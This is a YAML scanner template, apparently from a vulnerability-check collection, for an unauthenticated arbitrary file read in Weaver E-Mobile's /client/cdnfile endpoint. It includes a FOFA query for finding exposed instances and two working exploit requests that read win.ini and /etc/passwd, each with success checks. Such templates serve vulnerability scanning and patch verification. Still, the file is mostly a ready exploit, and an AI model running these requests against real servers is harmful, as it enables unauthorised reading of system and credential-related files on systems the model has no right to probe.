product: 泛微 E-Mobile
vName: 泛微E-Mobile cdnfile任意文件读取
type: 文件读取
vID: [ ]
level: 2
vDesc: 泛微E-Mobile是一款移动办公解决方案，由上海泛微网络科技股份有限公司专业研发。这款软件旨在为手机、平板电脑等移动终端用户提供便捷的办公体验。在/client/cdnfile接口存在任意文件读取漏洞，攻击者可以未授权下载服务器上任意文件，造成信息泄漏
version: ''
note: ''
search:
  FOFA: app="泛微-EMobile" || icon_hash="2062026853"
protocol: http
link: https://www.birdy02.com/2024/09/19/0288a12a-36f1-4cf8-b707-fe4f8139820d
fix:
  - 联系供应商，升级应用
  - 补丁 https://www.weaver.com.cn/cs/mobileDownload.html
model: ''
logic: or
exploit:
  - exp:
      method: get
      follow: false
      path: /client/cdnfile/1C/Windows/win.ini
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - for 16-bit app support
            logic: and
  - exp:
      method: get
      follow: false
      path: /client/cdnfile/C/etc/passwd
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - 'root:x:0'
            logic: and